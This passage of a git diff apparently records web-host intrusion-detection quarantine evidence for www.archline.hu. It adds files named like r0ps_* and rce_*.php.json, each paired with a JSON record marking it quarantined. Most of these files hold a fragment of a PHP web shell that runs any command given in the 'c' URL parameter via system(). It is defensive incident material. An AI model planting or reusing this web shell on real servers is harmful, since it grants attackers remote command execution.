+ "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/i9wliit0.php.json b/var/www/hosting/archline.hu/www/images/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..4ffb560 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3456", + "log_excerpt": "[quarantine] www.archline.hu:images/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930690, + "size": 57, + "uid": 20043 + }, + "rel_path": "images/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..bb82230 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3492", + "log_excerpt": "[quarantine] www.archline.hu:images/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111928, + "size": 74, + "uid": 20043 + }, + "rel_path": "images/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..219df17 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3499", + "log_excerpt": "[quarantine] www.archline.hu:images/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111913, + "size": 74, + "uid": 20043 + }, + "rel_path": "images/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..6a85c49 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3454", + "log_excerpt": "[quarantine] www.archline.hu:images/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111763, + "size": 74, + "uid": 20043 + }, + "rel_path": "images/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..ad31900 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3488", + "log_excerpt": "[quarantine] www.archline.hu:images/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111749, + "size": 74, + "uid": 20043 + }, + "rel_path": "images/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..bba220c --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3508", + "log_excerpt": "[quarantine] www.archline.hu:images/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111782, + "size": 74, + "uid": 20043 + }, + "rel_path": "images/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..1d1b9be --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3484", + "log_excerpt": "[quarantine] www.archline.hu:images/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111768, + "size": 74, + "uid": 20043 + }, + "rel_path": "images/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json b/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json.evidence.json new file mode 100644 index 0000000..b5c7747 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3483", + "log_excerpt": "[quarantine] www.archline.hu:images/rce_b9hy6i.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/rce_b9hy6i.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812889, + "size": 117, + "uid": 20043 + }, + "rel_path": "images/rce_b9hy6i.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json b/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json.evidence.json new file mode 100644 index 0000000..3eae0cb --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3498", + "log_excerpt": "[quarantine] www.archline.hu:images/rce_gi2uxq.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/rce_gi2uxq.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783812989, + "size": 117, + "uid": 20043 + }, + "rel_path": "images/rce_gi2uxq.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json b/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..82722cc --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4788", + "log_excerpt": "[quarantine] www.archline.hu:logs/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930717, + "size": 57, + "uid": 20043 + }, + "rel_path": "logs/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..d43b3af --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4792", + "log_excerpt": "[quarantine] www.archline.hu:logs/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111940, + "size": 74, + "uid": 20043 + }, + "rel_path": "logs/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..f497b7c --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4794", + "log_excerpt": "[quarantine] www.archline.hu:logs/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111921, + "size": 74, + "uid": 20043 + }, + "rel_path": "logs/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..db38776 --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4787", + "log_excerpt": "[quarantine] www.archline.hu:logs/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111776, + "size": 74, + "uid": 20043 + }, + "rel_path": "logs/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..bd448c3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4791", + "log_excerpt": "[quarantine] www.archline.hu:logs/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111757, + "size": 74, + "uid": 20043 + }, + "rel_path": "logs/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..704f84c --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4796", + "log_excerpt": "[quarantine] www.archline.hu:logs/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111795, + "size": 74, + "uid": 20043 + }, + "rel_path": "logs/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..96d33f7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4790", + "log_excerpt": "[quarantine] www.archline.hu:logs/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/logs/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111776, + "size": 74, + "uid": 20043 + }, + "rel_path": "logs/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/i9wliit0.php.json b/var/www/hosting/archline.hu/www/media/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/media/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..0b32199 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3041", + "log_excerpt": "[quarantine] www.archline.hu:media/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930695, + "size": 57, + "uid": 20043 + }, + "rel_path": "media/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..678a476 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3050", + "log_excerpt": "[quarantine] www.archline.hu:media/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111929, + "size": 74, + "uid": 20043 + }, + "rel_path": "media/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..dda9f10 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3051", + "log_excerpt": "[quarantine] www.archline.hu:media/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111914, + "size": 74, + "uid": 20043 + }, + "rel_path": "media/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..c9f20d6 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3040", + "log_excerpt": "[quarantine] www.archline.hu:media/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111765, + "size": 74, + "uid": 20043 + }, + "rel_path": "media/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..7ac0bbf --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3049", + "log_excerpt": "[quarantine] www.archline.hu:media/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111750, + "size": 74, + "uid": 20043 + }, + "rel_path": "media/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..29038ca --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3055", + "log_excerpt": "[quarantine] www.archline.hu:media/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111784, + "size": 74, + "uid": 20043 + }, + "rel_path": "media/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..5c0c88d --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3048", + "log_excerpt": "[quarantine] www.archline.hu:media/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111769, + "size": 74, + "uid": 20043 + }, + "rel_path": "media/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json b/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json.evidence.json b/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json.evidence.json new file mode 100644 index 0000000..4bdde19 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3043", + "log_excerpt": "[quarantine] www.archline.hu:media/rce_6s2a35.php.json -> quarantined 